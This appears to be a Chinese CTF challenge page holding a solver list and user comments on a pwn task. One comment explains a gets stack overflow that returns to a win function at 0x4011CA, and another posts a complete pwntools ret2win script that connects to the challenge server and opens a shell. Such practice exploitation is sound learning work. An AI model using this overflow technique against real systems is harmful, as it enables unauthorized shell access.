评分(0)
暂无评分
解题动态

AioKT 攻破了该题 6天前

wsmemail 攻破了该题 8天前

afag 攻破了该题 8天前

Bernie 攻破了该题 11天前

A9D9BD2A9516280E 攻破了该题 14天前

chengyi666 攻破了该题 28天前

tyyyyyyt 攻破了该题 1月前

Panda82 攻破了该题 2月前

longzhong 攻破了该题 2月前

fyut 攻破了该题 2月前

花落时相遇 攻破了该题 3月前

keylin 攻破了该题 3月前

19526226356 攻破了该题 3月前

sigmas 攻破了该题 3月前

king123 攻破了该题 4月前

LL2003 攻破了该题 4月前

梦游的小狐狸 攻破了该题 4月前

13536169969 攻破了该题 4月前

shuanghu 攻破了该题 4月前

评论
13536169969 4月前
举报
用乌班图,好吧
nil126 10月前
举报
ida中打开,64位的程序,发现一个128长度的buffer有堆栈溢出漏洞;还有一个win函数,里面有一条执行/bin/sh的指令,指令地址是0x4011CA。接下来要做的就是构造一个128+8+8字节长度的payload,128字节填充buffer,8字节填充执行gets时压栈的buffer指针,最后8字节写int64(0x4011CA)即下条指令位置。 调用gets时堆栈状态: |----
dongwenjia 1年前
举报
这题真恶心,要不是kali报错,我都不知道我pwn进去了,打通之后ls查看没内容,必须cat flag,什么都没显示出来后,在输入ls才看到flag,我真服了,还不是根目录。
怪我喽 1年前
举报
哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈
怪我喽 1年前
举报
from pwn import* io = remote('82.157.146.43',?) payload=b'p'*0x88+p64(0x4011CA) io.send(payload) io.interactive() 用这个程序肯定没问题,就看你在kali中怎么执行操作了。这题真勾八